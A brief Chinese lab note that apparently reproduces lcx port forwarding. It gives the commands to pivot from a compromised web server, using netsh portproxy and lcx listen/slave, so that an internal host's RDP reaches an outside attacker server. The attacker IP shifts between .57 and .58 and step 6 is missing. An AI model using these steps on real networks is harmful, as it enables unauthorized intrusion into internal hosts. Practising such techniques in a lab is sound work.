原由:今天老大要我们复现lcx的端口转发
工具:lcx
目的:登陆内网主机192.168.1.130的3389服务
受害者内网的主机(无法出网 但是能和内网的主机进行交互):192.168.1.130内网ip
受害者内网的主机(跳板 能出网):192.168.1.103内网ip
攻击者的外网服务器:120.79.66.57
1、通过受害者的主机的web服务拿到了服务器的shell权限
2、放入lcx.exe进行端口转发
3、首先192.168.1.103执行命令netsh interface portproxy add v4tov4 listenport=53 listenaddress=192.168.1.103 connectaddress=192.168.1.130 connectport=3389
4、在120.79.66.58执行lcx.exe –listen 4444 5555 (监听的4444端口的流量转发到5555端口上)
5、192.168.1.103执行lcx.exe -slave xxx.xxx.xxx.xxx 4444 192.168.1.103 53
7、120.79.66.58进行远程连接 mstsc xxx.xxx.xxx.xxx:5555->192.168.1.130:3389